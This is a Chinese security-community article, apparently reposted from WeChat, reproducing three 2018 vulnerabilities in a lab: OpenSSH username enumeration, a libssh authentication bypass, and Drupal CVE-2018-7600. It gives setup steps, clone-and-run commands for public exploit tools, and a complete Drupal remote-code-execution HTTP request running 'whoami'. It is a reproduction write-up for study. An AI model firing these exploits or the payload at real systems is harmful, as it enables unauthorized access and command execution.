圈子社区漏洞复现原创奖励计划优秀作品
漏洞复现由社区成员@无心、@silh0uette、@Si1ence、@blankmi、@neversec、@littleheary、@浪子莫回头
提供
所涉及课程和靶机已加入人人大佬实战靶场,欢迎来搞
因为本文过长,所以把全文做成了PDF,后台回复“漏洞”即可得下载链接。
1.CVE-2018-15473
漏洞介绍
漏洞影响
漏洞复现
环境搭建
漏洞主机Ubuntu 18.04Service: OpenSSH 7.6p1 IP: 192.168.153.130User: root breezy
自动安装
查看版本号sudo apt-cache madison openssh-server sudo apt-cache policy open-ssh-server
安装后重启服务即可/etc/init.d/ssh restart
手动安装
wget http://ftp.jaist.ac.jp/pub/OpenBSD/OpenSSH/portable/openssh-7.6p1.tar.gztar -zxvf openssh-7.6p1.tar.gzcd openssh-7.6p1./configure --prefix=/usr --sysconfdir=/etc/ssh --with-zlib --with-md5-passwordsmakesudo make install/etc/init.d/ssh restart
注意
sudo apt-get remove opensslwget https://www.openssl.org/source/openssl-1.0.2p.tar.gztar zxf openssl-1.0.2p.tar.gzcd openssl-1.0.2p/./configmake && sudo make install
攻击机Kali LinuxPython paramiko(2.40) IP: 192.168.153.132
git clone https://github.com/Rhynorater/CVE-2018-15473-Exploitpip install -r requirements.txtpython3 sshUsernameEnumExploit.py --port xx(默认为22) --userList xxx.txt ip
service ssh stop 关闭ssh服务器 否则会由于端口已使用而冲突sudo /usr/sbin/sshd -dd 如果出现Missing Privileges Sepration directory: /run/sshd则需要 创建这个文件夹sudo mkdir /run/sshd
2.CVE-2018-10933
漏洞介绍
漏洞影响
漏洞复现
环境搭建
apt-get updateapt-get install makeapt-get install gcc g++apt-get install zlib1g zlib1g-devapt-get install openssl libssl-dev
apt-get install build-essentialwget https://cmake.org/files/v3.8/cmake-3.8.2.tar.gztar xf cmake-3.8.2.tar.gzcd cmake-3.8.2./configuremakemake install 或apt-get install checkinstall && checkinstall
git clone https://github.com/hackerhouse-opensource/cve-2018-10933.gitcd cve-2018-10933xz -d libssh-0.8.3.tar.xztar -xf libssh-0.8.3.tar
cd libssh-0.8.3patch -p0 < ../cve-2018-10933.patchpatch -p0 < ../server.patchmkdir buildcd buildcmake ..makemake install
cd /root/ssh-keygen -t dsa -f ssh_host_dsa_key -N ''ssh-keygen -t rsa -b 2048 -f ssh_host_rsa_key -N ''
https://github.com/blacknbunny/libSSH-Authentication-Bypasshttps://github.com/hackerhouse-opensource/cve-2018-10933https://github.com/leapsecurity/libssh-scanner
cd /root/soft/cve-2018-10933/libssh-0.8.3/build/examples/./ssh_server_fork -d /root/ssh_host_dsa_key -k /root/ssh_host_rsa_key -p 2222 -v 0.0.0.0
git clone https://github.com/leapsecurity/libssh-scanner.gitcd libssh-scannerpip install -r requirements.txt
git clone https://github.com/blacknbunny/libSSH-Authentication-Bypass.git libssh-authentication-bypasscd libssh-authentication-bypasspip install -r requirements.txt
3.CVE-2018-7600
漏洞介绍
漏洞影响
漏洞复现
https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1Host: 192.168.222.129:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 107form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=whoami
本文始发于微信公众号(Secquan圈子社区):2018年十大远程利用(RCE)漏洞原创复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论